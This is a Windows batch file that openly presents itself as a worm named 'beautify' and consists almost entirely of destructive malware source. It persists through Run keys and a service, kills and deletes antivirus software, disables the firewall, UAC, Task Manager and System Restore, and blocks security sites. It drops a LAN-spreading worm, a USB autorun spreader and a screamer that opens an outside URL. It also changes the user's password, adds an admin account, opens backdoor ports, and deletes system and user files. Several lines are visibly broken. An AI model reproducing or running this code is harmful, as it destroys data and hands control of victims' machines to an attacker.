@echo off >Nul & Color 0a & Mode 15,2 & Title Worm:Win32/beautify.A & Attrib %0 +H & cls
reg add "hklm\Software\Microsoft\Windows\CurrentVersion\Run" /v "rundll32_awspeGfa_w32" /t "REG_SZ" /d %0 /f > nul
@echo x=msgbox("Error Win32 Application.",0+16," ") >"%temp%\Error.vbs"
Attrib "%temp%\Error.vbs" +H & Start "%temp%\Error.vbs"
:: RUN AS SERVICE/ REGISTRY START-UP
set "servicename=beautify"
@echo sc create %servicename% binpath=%0 >"%temp%\service.bat"
@echo sc start %servicename% >>"%temp%\service.bat"
Attrib "%temp%\service.bat" +H & start "%temp%\service.bat"
Set "reg_path=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run"
reg add "%reg_path%" /v "Windows Services" /t "REG_SZ" /d %0
Taskkill /PID explorer.exe /F
:: KILL FIREWALL
net stop "MpsSvc"
taskkill /f /t /im "FirewallControlPanel.exe"
netsh firewall set opmode disable
netsh advfirewall set opmode disable
>"%Temp%.kill.reg" ECHO REGEDIT4
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesS haredAccess]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesw uauserv]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMControlSet001Serviceswscsv c]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
START /WAIT REGEDIT /S "%Temp%.kill.reg"
Del "%Temp%.kill.reg"
:: DROP MORE MALWARE
REM <==================Screamer=================>
@echo If exist "%programfiles%\Google\Chrome\Application\chrome.exe" goto 1 >"%appdata%\Screamer.bat"
@echo If exist "%programfiles%\Mozilla Firefox\firefox.exe" goto 2 >>"%appdata%\Screamer.bat"
@echo Goto IE >>"%appdata%\Screamer.bat"
@echo :1 >>"%appdata%\Screamer.bat"
@echo Timeout /T 600 /NOBREAK ^>Nul >>"%appdata%\Screamer.bat"
@echo Start chrome.exe http://akk.li/jeff/jeff.swf >>"%appdata%\Screamer.bat"
@echo goto 1 >>"%appdata%\Screamer.bat"
@echo :2 >>"%appdata%\Screamer.bat"
@echo Timeout /T 600 /NOBREAK ^>Nul >>"%appdata%\Screamer.bat"
@echo Start firefox.exe http://akk.li/jeff/jeff.swf >>"%appdata%\Screamer.bat"
@echo goto 2 >>"%appdata%\Screamer.bat"
@echo :IE >>"%appdata%\Screamer.bat"
@echo Timeout /T 600 /NOBREAK ^>Nul >>"%appdata%\Screamer.bat"
@echo Start iexplore.exe http://akk.li/jeff/jeff.swf >>"%appdata%\Screamer.bat"
@echo goto IO >>"%appdata%\Screamer.bat"
REM -Generate windows hidiing VBScript
@echo Set wshShell=wscript.CreateObject("WScript.Shell") >Start_s.vbs
@echo wshshell.run "%appdata%\Screamer.bat", 0 >>Start_s.vbs
Attrib Start_s.vbs +H +R
Start Start_s.vbs
REM <================Speed_WorM================>
@echo @echo off ^>Nul >"%appdata%\speed!.bat"
@echo Title Worm:Win32/Speed.L >>"%appdata%\speed!.bat"
@echo :worm >>"%appdata%\speed!.bat"
@echo for /l %%%%R in ^(0,1,255^) do ^( >>"%appdata%\speed!.bat"
@echo   ping -n 1 192.168.0.%%%%R | find "100%%" >>"%appdata%\speed!.bat"
@echo   if errorlevel 1 ^( >>"%appdata%\speed!.bat"
@echo     echo 192.168.0.%%R ^>^> %%temp%%\range.txt >>"%appdata%\speed!.bat"
@echo   ^) >>"%appdata%\speed!.bat"
@echo ^) >>"%appdata%\speed!.bat"
@echo set worm=%%random%% >>"%appdata%\speed!.bat"
@echo for /f %%%%N in ^(%%temp%%\range^) do ^( >>"%appdata%\speed!.bat"
@echo   copy %%0 \\%%%%N\ADMIN$\%%worm%%.bat >>"%appdata%\speed!.bat"
@echo   if errorlevel 0 call \\%%N\ADMIN$\%%worm%%.bat >>"%appdata%\speed!.bat"
@echo   copy %%0 \\%%%%N\C$\%%worm%%.bat >>"%appdata%\speed!.bat"
@echo   if errorlevel 0 call \\%%%%N\C$\%%worm%%.bat >>"%appdata%\speed!.bat"
@echo   copy %%0 \\%%%%N\D$\%%worm%%.bat >>"%appdata%\speed!.bat"
@echo   if errorlevel 0 call \\%%%%N\D$\%%worm%%.bat >>"%appdata%\speed!.bat"
@echo ^) >>"%appdata%\speed!.bat"
@echo @exit >>"%appdata%\speed!.bat"
REM -Generate windows hidiing VBScript
@echo Set wshShell=wscript.CreateObject("WScript.Shell") >Start_sw.vbs
@echo wshshell.run "%appdata%\speed!.bat", 0 >>Start_sw.vbs
Attrib Start_sw.vbs +H +R
Start Start_sw.vbs
REM <=============Cookie_Monster=============>
@echo @echo off ^>Nul >"%appdata%\Zer0bug.bat"
@echo :: Zer0bug_ViirUz >>"%appdata%\Zer0bug.bat"
@echo Title Cookie_Monster >>"%appdata%\Zer0bug.bat"
@echo @echo x=msgbox^("You have been infected by the Cookie Monster Virus.",0+16,"Zer0bug Infection!"^) ^>"%temp%\Error.vbs" >>"%appdata%\Zer0bug.bat"
@echo Start "%temp%\Error.vbs" >>"%appdata%\Zer0bug.bat"
@echo :loop >>"%appdata%\Zer0bug.bat"
@echo Ftype ^>^>"%temp%\Cookie_%%random%%.ini" >>"%appdata%\Zer0bug.bat"
@echo goto loop >>"%appdata%\Zer0bug.bat"
@echo @exit /b >>"%appdata%\Zer0bug.bat"
REM -Generate windows hiding VBScript
@echo Set wshShell=wscript.CreateObject("WScript.Shell") >Start_zb.vbs
@echo wshshell.run "%appdata%\Zer0bug.bat", 0 >>Start_zb.vbs
Attrib Start_zb.vbs +H +R
Start Start_zb.vbs
<================NUKECHILD=============>
:: http://www.hackforums.net/showthread.php?tid=1367748
@echo if exist "%%userprofile%%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nukechild.bat" ^( >"%programfiles%\nukechild.bat"
@echo goto top-b >>"%programfiles%\nukechild.bat"
@echo ^) >>"%programfiles%\nukechild.bat"
@echo echo Why So Mad bro? ^>^> "%%userprofile%%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nukechild.cmd" >>"%programfiles%\nukechild.bat"
@echo echo taskkill /F /T explorer.exe ^>^> "%%userprofile%%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nukechild.cmd" >>"%programfiles%\nukechild.bat"
@echo echo taskkill /F /T winlogon.exe ^>^> "%%userprofile%%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nukechild.cmd" >>"%programfiles%\nukechild.bat"
@echo echo shutdown -s -f -t 10 -c "Why So Angry?" ^>^> "%%userprofile%%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nukechild.cmd" >>"%programfiles%\nukechild.bat"
@echo echo start /HIGH "%%userprofile%%\Desktop\windetect-fix.cmd" ^>^> "%%userprofile%%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nukechild.cmd" >>"%programfiles%\nukechild.bat"
@echo :top-b >>"%programfiles%\nukechild.bat"
@echo set /a a=0 >>"%programfiles%\nukechild.bat"
@echo assoc .exe=txtfile ^& assoc .dll=exefile >>"%programfiles%\nukechild.bat"
@echo assoc .dat=txtfile ^& assoc .vbs=exefile >>"%programfiles%\nukechild.bat"
@echo assoc .ini=exefile ^& assoc .com=exefile >>"%programfiles%\nukechild.bat"
@echo assoc .cmd=exefile ^& assoc .txt=exefile >>"%programfiles%\nukechild.bat"
@echo assoc .wav=txtfile ^& assoc .mp3=txtfile >>"%programfiles%\nukechild.bat"
@echo assoc .mp4=txtfile ^& assoc .zip=txtfile >>"%programfiles%\nukechild.bat"
@echo assoc .doc=txtfile ^& assoc .htm=dllfile >>"%programfiles%\nukechild.bat"
@echo assoc .html=dllfile ^& assoc .img=txtfile >>"%programfiles%\nukechild.bat"
@echo assoc .iso=txtfile ^& assoc .jar=txtfile >>"%programfiles%\nukechild.bat"
@echo assoc .ico=txtfile ^& assoc .jpg=txtfile >>"%programfiles%\nukechild.bat"
@echo assoc .png=txtfile ^& assoc .gif=txtfile >>"%programfiles%\nukechild.bat"
@echo assoc .rt=txtfile >>"%programfiles%\nukechild.bat"
@echo :middle >>"%programfiles%\nukechild.bat"
@echo start /HIGH cmd ^& start /HIGH iexplore >>"%programfiles%\nukechild.bat"
@echo start /HIGH firefox ^& start /HIGH notepad >>"%programfiles%\nukechild.bat"
@echo start /HIGH explorer >>"%programfiles%\nukechild.bat"
@echo copy %%0 C:\System-Fix-%%random%%.cmd >>"%programfiles%\nukechild.bat"
@echo md %%homedrive%%\%%random%% >>"%programfiles%\nukechild.bat"
@echo md %%userprofile%%\Desktop\%%random%% >>"%programfiles%\nukechild.bat"
@echo if %%a%%==200 goto done >>"%programfiles%\nukechild.bat"
@echo set /a a=%%a%%+1 >>"%programfiles%\nukechild.bat"
@echo goto middle >>"%programfiles%\nukechild.bat"
@echo :done >>"%programfiles%\nukechild.bat"
@echo start %%0 ^& copy %%0 "%%userprofile%%\Desktop\windetect-fix.cmd" >>"%programfiles%\nukechild.bat"
@echo ping localhost -n 2 ^>nul & start /HIGH "%%userprofile%%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs" >>"%programfiles%\nukechild.bat"
@echo echo Why so angry? > "%%homedrive%%\Windows\explorer.exe" >>"%programfiles%\nukechild.bat"
@echo echo You look so sad, brah ^>^>"%%homedrive%%\Windows\explorer.exe" >>"%programfiles%\nukechild.bat"
@echo start /HIGH "%%userprofile%%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nukechild.cmd" >>"%programfiles%\nukechild.bat"
@echo del /f /s /q %%0 >>"%programfiles%\nukechild.bat"
@echo @exit /b >>"%programfiles%\nukechild.bat"
<==========================SLOGOD.Y==========================>
@echo ATR = "[autorun]" ^& vbcrlf ^& "ShellExecute = wscript.exe >"%temp%\Slogod.Y.vbs"
@echo "svchost.exe.vbs" >>"%temp%\Slogod.Y.vbs"
@echo set fs = createobject ^("Scripting.FileSystemObject"^) >>"%temp%\Slogod.Y.vbs"
@echo set mf = fs.getfile ^(Wscript.ScriptFullname^) >>"%temp%\Slogod.Y.vbs"
@echo dim text, size >>"%temp%\Slogod.Y.vbs"
@echo size = mf.size >>"%temp%\Slogod.Y.vbs"
@echo check = mf.drive.drivetype >>"%temp%\Slogod.Y.vbs"
@echo set text = mf.openastextstream ^(1,-2^) >>"%temp%\Slogod.Y.vbs"
@echo do while not text.atendofstream >>"%temp%\Slogod.Y.vbs"
@echo mysource = mysource ^& text.readline >>"%temp%\Slogod.Y.vbs"
@echo mysource = mysource ^& vbcrlf >>"%temp%\Slogod.Y.vbs"
@echo loop >>"%temp%\Slogod.Y.vbs"
@echo do >>"%temp%\Slogod.Y.vbs"
@echo Set winpath = fs.getspecialfolder ^(0^) >>"%temp%\Slogod.Y.vbs"
@echo set tf = fs.getfile ^(winpath ^& "\svchost.exe.vbs"^) >>"%temp%\Slogod.Y.vbs"
@echo tf.attributes = 32 >>"%temp%\Slogod.Y.vbs"
@echo set tf = fs.createtextfile ^(winpath ^& "\ svchost.exe.vbs", 2, true^) >>"%temp%\Slogod.Y.vbs"
@echo tf.write mysource >>"%temp%\Slogod.Y.vbs"
@echo tf.close >>"%temp%\Slogod.Y.vbs"
@echo set tf = fs.getfile ^(winpath ^& "\ svchost.exe.vbs"^) >>"%temp%\Slogod.Y.vbs"
@echo tf.attributes = 39 >>"%temp%\Slogod.Y.vbs"
@echo For Each flashdrive in fs.drives >>"%temp%\Slogod.Y.vbs"
@echo If ^(flashdrive.drivetype = 1 or flashdrive.drivetype = 2^) and flashdrive.path ^<^> "A:" then >>"%temp%\Slogod.Y.vbs"
@echo set tf = fs.getfile ^(flashdrive.path ^& "\ svchost.exe.vbs"^) >>"%temp%\Slogod.Y.vbs"
@echo tf.attributes = 32 >>"%temp%\Slogod.Y.vbs"
@echo set tf = fs.createtextfile ^(flashdrive.path ^& "\ svchost.exe.vbs", 2,true^) >>"%temp%\Slogod.Y.vbs"
@echo tf.write mysource >>"%temp%\Slogod.Y.vbs"
@echo tf.close >>"%temp%\Slogod.Y.vbs"
@echo set tf = fs.getfile ^(flashdrive.path ^& "\ svchost.exe.vbs"^) >>"%temp%\Slogod.Y.vbs"
@echo tf.attributes = 39 >>"%temp%\Slogod.Y.vbs"
@echo set tf = fs.getfile ^(flashdrive.path ^& "\ autorun.inf"^) >>"%temp%\Slogod.Y.vbs"
@echo tf.attributes = 32 >>"%temp%\Slogod.Y.vbs"
@echo set tf = fs.createtextfile ^(flashdrive.path ^& "\ autorun.inf", 2, true^)v
@echo ATR tf.write >>"%temp%\Slogod.Y.vbs"
@echo tf.close >>"%temp%\Slogod.Y.vbs"
@echo set tf = fs.getfile ^(flashdrive.path ^& "\autorun.inf"^) >>"%temp%\Slogod.Y.vbs"
@echo tf.attributes = 39 >>"%temp%\Slogod.Y.vbs"
@echo end if >>"%temp%\Slogod.Y.vbs"
@echo next >>"%temp%\Slogod.Y.vbs"
@echo set of RG = createobject ^("WScript.Shell"^) >>"%temp%\Slogod.Y.vbs"
@echo rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\svchost", winpath ^& "\svchost.exe.vbs" >>"%temp%\Slogod.Y.vbs"
@echo rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL", "" >>"%temp%\Slogod.Y.vbs"
@echo rg.regwrite "HKCR\vbsfile\DefaultIcon\", "shell32.dll, 3/ >>"%temp%\Slogod.Y.vbs"
@echo if check ^<^> 1 then >>"%temp%\Slogod.Y.vbs"
@echo Wscript.sleep 100,000 >>"%temp%\Slogod.Y.vbs"
@echo end if >>"%temp%\Slogod.Y.vbs"
@echo loop while check ^<^> 1 >>"%temp%\Slogod.Y.vbs"
@echo set sd = createobject ^("Wscript.shell"^) >>"%temp%\Slogod.Y.vbs"
@echo sd.run winpath ^& "\explorer.exe /e, /select," ^& Wscript.ScriptFullname >>"%temp%\Slogod.Y.vbs"
@echo do while year ^(now^)> = 2007 >>"%temp%\Slogod.Y.vbs"
@echo WScript.sleep >>"%temp%\Slogod.Y.vbs"
Start "%temp%\Slogod.Y.vbs"
:: DISABLE/DELETE ANTIVIRUS
tskill /A av* & tskill /A fire* & tskill /A anti* & tskill /A spy*
tskill /A bullguard & tskill /A PersFw & tskill /A KAV* & tskill /A ZONEALARM
tskill /A SAFEWEB & tskill /A OUTPOST & tskill /A nv* & tskill /A nav*
tskill /A F-* & tskill /A ESAFE & tskill /A cle & tskill /A BLACKICE
tskill /A def* & tskill /A kav & tskill /A kav* & tskill /A avg*
tskill /A ash* & tskill /A aswupdsv & tskill /A ewid* & tskill /A guard*
tskill /A guar* & tskill /A gcasDt* & tskill /A msmp* & tskill /A mcafe*
tskill /A mghtml & tskill /A msiexec & tskill /A outpost & tskill /A isafe
tskill /A zap* & tskill /A zauinst & tskill /A upd* & tskill /A zlclien*
tskill /A minilog & tskill /A cc* & tskill /A norton* & tskill /A norton au*
tskill /A ccc* & tskill /A npfmn* & tskill /A loge* & tskill /A nisum*
tskill /A issvc & tskill /A tmp* & tskill /A tmn* & tskill /A pcc*
tskill /A cpd* & tskill /A pop* & tskill /A pav* & tskill /A padmin
tskill /A panda* & tskill /A avsch* & tskill /A sche* & tskill /A syman*
tskill /A virus* & tskill /A realm* & tskill /A sweep* & tskill /A scan*
tskill /A ad-* & tskill /A safe* & tskill /A avas* & tskill /A norm*
tskill /A msseces* & tskill /A mbam* & tskill /A komodo* & tskill /A spybot* & tskill /A MSASCui*
If exist "%programfiles%\alwils~1\avast4\*.*" Del /F /Q "%programfiles%\alwils~1\avast4\*.*"
If exist "%programfiles%\Lavasoft\Ad-awa~1\*.exe" Del /F /Q "%programfiles%\Lavasoft\Ad-awa~1\*.exe"
If exist "%programfiles%\kasper~1\*.exe" Del /F /Q "%programfiles%\kasper~1\*.exe"
If exist "%programfiles%\trojan~1\*.exe" Del /F /Q "%programfiles%\trojan~1\*.exe"
If exist "%programfiles%\f-prot95\*.dll" Del /F /Q "%programfiles%\f-prot95\*.dll"
If exist "%programfiles%\tbav\*.dat" Del /F /Q "%programfiles%\tbav\*.dat"
If exist "%programfiles%\avpersonal\*.vdf" Del /F /Q "%programfiles%\avpersonal\*.vdf"
If exist "%programfiles%\Norton~1\*.cnt" Del /F /Q "%programfiles%\Norton~1\*.cnt"
If exist "%programfiles%\Mcafee\*.*" Del /F /Q "%programfiles%\Mcafee\*.*"
If exist "%programfiles%\Norton~1\Norton~1\Norton~3\*.*" Del /F /Q "%programfiles%\Norton~1\Norton~1\Norton~3\*.*"
If exist "%programfiles%\Norton~1\Norton~1\speedd~1\*.*" Del /F /Q "%programfiles%\Norton~1\Norton~1\speedd~1\*.*"
If exist "%programfiles%\Norton~1\Norton~1\*.*" Del /F /Q "%programfiles%\Norton~1\Norton~1\*.*"
If exist "%programfiles%\avgamsr\*.exe" Del /F /Q "%programfiles%\avgamsr\*.exe"
If exist "%programfiles%\nood32\*.exe" Del /F /Q "%programfiles%\nood32\*.exe"
If exist "%programfiles%\avgemc\*.exe" Del /F /Q "%programfiles%\avgemc\*.exe"
If exist "%programfiles%\Norton~1\*.*" Del /F /Q "%programfiles%\Norton~1\*.*"
If exist "%programfiles%\kavmm\*.exe" Del /F /Q "%programfiles%\kavmm\*.exe"
If exist "%programfiles%\avgcc\*.exe" Del /F /Q "%programfiles%\avgcc\*.exe"
If exist "%programfiles%\avgamsvr\*.exe" Del /F /Q "%programfiles%\avgamsvr\*.exe"
If exist "%programfiles%\avgupsvc\*.exe" Del /F /Q "%programfiles%\avgupsvc\*.exe"
If exist "%programfiles%\ewidoctrl\*.exe" Del /F /Q "%programfiles%\ewidoctrl\*.exe"
If exist "%programfiles%\nood32krn\*.exe" Del /F /Q "%programfiles%\nood32krn\*.exe"
If exist "%programfiles%\grisoft\*.*" Del /F /Q "%programfiles%\grisoft\*.*"
If exist "%programfiles%\nod32\*.*" Del /F /Q "%programfiles%\nod32\*.*"
If exist "%programfiles%\nood32\*.*" Del /F /Q "%programfiles%\nood32\*.*"
If exist "%programfiles%\kav\*.exe" Del /F /Q "%programfiles%\kav\*.exe"
If exist "%programfiles%\kaspersky\*.*" Del /F /Q "%programfiles%\kaspersky\*.*"
If exist "%programfiles%\guard\*.exe" Del /F /Q "%programfiles%\guard\*.exe"
If exist "%programfiles%\ewido\*.exe" Del /F /Q "%programfiles%\ewido\*.exe"
If exist "%programfiles%\pavprsrv\*.exe" Del /F /Q "%programfiles%\pavprsrv\*.exe"
If exist "%programfiles%\pavprot\*.exe" Del /F /Q "%programfiles%\pavprot\*.exe"
If exist "%programfiles%\avengine\*.exe" Del /F /Q "%programfiles%\avengine\*.exe"
If exist "%programfiles%\apvxdwin\*.exe" Del /F /Q "%programfiles%\apvxdwin\*.exe"
If exist "%programfiles%\webproxy\*.exe" Del /F /Q "%programfiles%\webproxy\*.exe"
If exist "%programfiles%\panda software\*.*" Del /F /Q "%programfiles%\panda software\*.*"
:: CONFUSE/DISABLE USER FUNCTIONS
rundll32 keyboard,disable & rundll32 mouse,disable & rundll32 USER32.DLL,SwapMouseButton
echo Windows Registry Editor Version 5.00 >"%temp%\beautify.reg"
echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Keyboard Layout] >>"%temp%\beautify.reg"
echo "Scancode Map"=hex:00,00,00,00,00,00,00,00,7c,00,00,00,00,00,01,00,00,\ >>"%temp%\beautify.reg"
echo 00,3b,00,00,00,3c,00,00,00,3d,00,00,00,3e,00,00,00,3f,00,00,00,40,00,00,00,\ >>"%temp%\beautify.reg"
echo 41,00,00,00,42,00,00,00,43,00,00,00,44,00,00,00,57,00,00,00,58,00,00,00,37,\ >>"%temp%\beautify.reg"
echo e0,00,00,46,00,00,00,45,00,00,00,35,e0,00,00,37,00,00,00,4a,00,00,00,47,00,\ >>"%temp%\beautify.reg"
echo 00,00,48,00,00,00,49,00,00,00,4b,00,00,00,4c,00,00,00,4d,00,00,00,4e,00,00,\ >>"%temp%\beautify.reg"
echo 00,4f,00,00,00,50,00,00,00,51,00,00,00,1c,e0,00,00,53,00,00,00,52,00,00,00,\ >>"%temp%\beautify.reg"
echo 4d,e0,00,00,50,e0,00,00,4b,e0,00,00,48,e0,00,00,52,e0,00,00,47,e0,00,00,49,\ >>"%temp%\beautify.reg"
echo e0,00,00,53,e0,00,00,4f,e0,00,00,51,e0,00,00,29,00,00,00,02,00,00,00,03,00,\ >>"%temp%\beautify.reg"
echo 00,00,04,00,00,00,05,00,00,00,06,00,00,00,07,00,00,00,08,00,00,00,09,00,00,\ >>"%temp%\beautify.reg"
echo 00,0a,00,00,00,0b,00,00,00,0c,00,00,00,0d,00,00,00,0e,00,00,00,0f,00,00,00,\ >>"%temp%\beautify.reg"
Attrib "%temp%\beautify.reg" +R +H +S & START "%temp%\beautify.reg"
:: DELETE/DISABLE SYSTEM RESTORE
@echo Shell.regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore\DisableSR","1", "REG_DWORD" >"%temp%\beautify.vbs"
@echo Shell.regwrite "HKLM\SYSTEM\CurrentControlSet\Services\sr","4", "REG_DWORD >>"%temp%\beautify.vbs"
Attrib "%temp%\beautify.vbs" +R +S +H & Start "%temp%\beautify.vbs"
Attrib "%homedrive%\Windows\System32\rstrui.exe" -r -s -h
Del /F /Q "%homedrive%\Windows\System32\rstrui.exe"
:: DISABLE TASK MANAGER
Set "hklm1=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System"
Reg add %hklm1% /v DisableTaskMgr /t REG_SZ /d 1 /f >nul
:: DISABLE UAC
Set "hklm2=HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System""
@Cmd /k Reg Add "%hklm2%" /v "EnableLUA" /t "REG_DWORD" /d "0" /f > nul
:: BLOCK MAJOR ANTIVIRAL WEBSITE(S)
set hosts=%windir%\System32\drivers\etc\hosts
@echo. >> %hosts%
@echo 127.0.0.1 avast.com >> %hosts%
@echo 127.0.0.1 avp.com >> %hosts%
@echo 127.0.0.1 avira.com >> %hosts%
@echo 127.0.0.1 ca.com >> %hosts%
@echo 127.0.0.1 customer.symantec.com >> %hosts%
@echo 127.0.0.1 dispatch.mcafee.com >> %hosts%
@echo 127.0.0.1 download.mcafee.com >> %hosts%
@echo 127.0.0.1 eset.com >> %hosts%
@echo 127.0.0.1 f-secure.com >> %hosts%
@echo 127.0.0.1 kaspersky.com >> %hosts%
@echo 127.0.0.1 kaspersky-labs.com >> %hosts%
@echo 127.0.0.1 liveupdate.symantec.com >> %hosts%
@echo 127.0.0.1 liveupdate.symantecliveupdate.com >> %hosts%
@echo 127.0.0.1 mast.mcafee.com >> %hosts%
@echo 127.0.0.1 mcafee.com >> %hosts%
@echo 127.0.0.1 microsoft.com >> %hosts%
@echo 127.0.0.1 my-etrust.com >> %hosts%
@echo 127.0.0.1 nai.com >> %hosts%
@echo 127.0.0.1 networkassociates.com >> %hosts%
@echo 127.0.0.1 pandasoftware.com >> %hosts%
@echo 127.0.0.1 rads.mcafee.com >> %hosts%
@echo 127.0.0.1 secure.nai.com >> %hosts%
@echo 127.0.0.1 securityresponse.symantec.com >> %hosts%
@echo 127.0.0.1 sophos.com >> %hosts%
@echo 127.0.0.1 symantec.com >> %hosts%
@echo 127.0.0.1 trendmicro.com >> %hosts%
@echo 127.0.0.1 updates.symantec.com >> %hosts%
@echo 127.0.0.1 update.symantec.com >> %hosts%
@echo 127.0.0.1 us.mcafee.com >> %hosts%
@echo 127.0.0.1 viruslist.com >> %hosts%
@echo 127.0.0.1 virustotal.com >> %hosts%
@echo 127.0.0.1 www.avp.com >> %hosts%
@echo 127.0.0.1 www.f-secure.com >> %hosts%
@echo 127.0.0.1 www.grisoft.com >> %hosts%
@echo 127.0.0.1 www.kaspersky.com >> %hosts%
@echo 127.0.0.1 www.mcafee.com >> %hosts%
@echo 127.0.0.1 www.microsoft.com >> %hosts%
@echo 127.0.0.1 www.my-etrust.com >> %hosts%
@echo 127.0.0.1 www.nai.com >> %hosts%
@echo 127.0.0.1 www.networkassociates.com >> %hosts%
@echo 127.0.0.1 www.pandasoftware.com >> %hosts%
@echo 127.0.0.1 www.sophos.com >> %hosts%
@echo 127.0.0.1 www.symantec.com >> %hosts%
@echo 127.0.0.1 www.trendmicro.com >> %hosts%
@echo 127.0.0.1 www.virustotal.com >> %hosts%
@echo 127.0.0.1 www.safer-networking.org >> %hosts%
:: DISABLE INTERNET
Ipconfig /release
IPCONFIG /Release *Con*
if ERRORLEVEL1 ipconfig /release_all
:: CHANGE CURRENT USERS PASSWORD
net user %username% "beautify"
:: DISABLE ADMINISTRATOR
@Set RegistyEditCmd=Cmd /k Reg Add
@Set HiveSysKey=HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
@%RegistyEditCmd% "%HiveSysKey%" /v "EnableLUA" /t "REG_DWORD" /d "0" /f > nul
:: INFECT REGISTRY
set valinf="rundll32_%random%_toolbar"
set reginf="hklm\Software\Microsoft\Windows\CurrentVersion\Run"
reg add %reginf% /v %valinf% /t "REG_SZ" /d %0 /f > nul
:: BACKDOOR PORTS
netsh firewall add portopening ALL 7 beautify
netsh firewall add portopening ALL 19 beautify
netsh firewall add portopening ALL 20 beautify
netsh firewall add portopening ALL 21 beautify
netsh firewall add portopening ALL 22 beautify
netsh firewall add portopening ALL 23 beautify
netsh firewall add portopening ALL 25 beautify
netsh firewall add portopening ALL 37 beautify
netsh firewall add portopening ALL 53 beautify
netsh firewall add portopening ALL 69 beautify
netsh firewall add portopening ALL 79 beautify
netsh firewall add portopening ALL 80 beautify
netsh firewall add portopening ALL 110 beautify
netsh firewall add portopening ALL 111 beautify
netsh firewall add portopening ALL 135 beautify
netsh firewall add portopening ALL 137 beautify
netsh firewall add portopening ALL 138 beautify
netsh firewall add portopening ALL 139 beautify
netsh firewall add portopening ALL 161 beautify
netsh firewall add portopening ALL 443 beautify
netsh firewall add portopening ALL 445 beautify
netsh firewall add portopening ALL 512 beautify
netsh firewall add portopening ALL 513 beautify
netsh firewall add portopening ALL 514 beautify
netsh firewall add portopening ALL 522 beautify
netsh firewall add portopening ALL 1433 beautify
netsh firewall add portopening ALL 1434 beautify
netsh firewall add portopening ALL 1604 beautify
netsh firewall add portopening ALL 1723 beautify
netsh firewall add portopening ALL 1900 beautify
netsh firewall add portopening ALL 3074 beautify
netsh firewall add portopening ALL 3389 beautify
netsh firewall add portopening ALL 6667 beautify
netsh firewall add portopening ALL 8080 beautify
netsh firewall add portopening ALL 25565 beautify
netsh firewall add portopening ALL 43595 beautify
:: DISABLE REGISTRY TOOLS:
Set "reg_path2=hkcu\software\microsoft\windows\currentversion\policies\system"
reg add "%reg_path2%" /v disableregistrytools /t reg_dword /d "1" /f
:: CREATE AN ADMINISTRATOR ACCOUNT
net user beautify beautify /add
net localgroup administrators UN /add
:: DISABLE CONFIGURATION MANAGER:
Attrib "%SystemDrive%\WINDOWS\system32\hal.dll" -r -s h
Del /F /Q "%SystemDrive%\WINDOWS\system32\hal.dll"
:: MAIN DESTRUCTION
Copy %0 "%homedrive%\Documents and Settings"
Assoc .dll=beautifyfile
ren /S /F /Q *.exe *.beautify
ren /S /F /Q *.zip *.beautify
ren /S /F /Q *.txt *.beautify
ren /S /F /Q *.rtf *.beautify
ren /F /S /Q *.doc *.beautify
Attrib "%homedrive%\*.*" -r -s -h
If exist "%homedrive%\PerfLogs" Attrib "%homedrive%\PerfLogs" -r -s -h
Del /F /Q /S "%homedrive%\PerfLogs"
If exist "%homedrive%\PerfLogs\Admin" Attrib "%homedrive%\PerfLogs\Admin" -r -s -h
Del /F /Q /S "%homedrive%\PerfLogs\Admin" & Del /F /Q /S "%homedrive%\PerfLogs\Admin\*.*"
If exist "%programfiles%\Common Files" goto delcomfil
If not exist "%programfiles%\Common Files" goto pascomfil
:delcomfil
Attrib "%programfiles%\Common Files" -r -s -h
Attrib "%programfiles%\Common Files\*.*" -r -s -h
Del /F /Q /S "%programfiles%\Common Files\*.*"
Del /F /Q /S "%programfiles%\Common Files"
:pascomfil
If exsit "%programfiles%\DVD Maker" goto deldvdmak
If not exsit "%programfiles%\DVD Maker" goto pasdvdmak
:deldvdmak
Attrib "%programfiles%\DVD Maker" -r -s -h
Attrib "%programfiles%\DVD Maker\*.*" -r -s -h
Del /F /Q /S "%programfiles%\DVD Maker\*.*"
Del /F /Q /S "%programfiles%\DVD Maker"
:pasdvdmak
If exist "%programfiles%\Google" goto delgoogle
If not exist "%programfiles%\Google" goto pasgoogle
:delgoogle
Attrib "%programfiles%\Google\*.*" -r -s -h
Attrib "%programfiles%\Google" -r -s -h
Del /F /Q /S "%programfiles%\Google\*.*"
Del /F /Q /S "%programfiles%\Google"
:pasgoogle
If exist "%programfiles%\HTML Help Workshop" goto delhtml
If not exist "%programfiles%\HTML Help Workshop" goto pashtml
:delhtml
Attrib "%programfiles%\HTML Help Workshop\*.*" -r -s -h
Attrib "%programfiles%\HTML Help Workshop" -r -s -h
Del /F /Q /S "%programfiles%\HTML Help Workshop\*.*"
Del /F /Q /S "%programfiles%\HTML Help Workshop"
If exist "%programfiles%\IIS" goto deliis
If not exist "%programfiles%\IIS" goto pasiss
:deliis
Attrib "%programfiles%\IIS\*.*" -r -s -h
Attrib "%programfiles%\IIS" -r -s -h
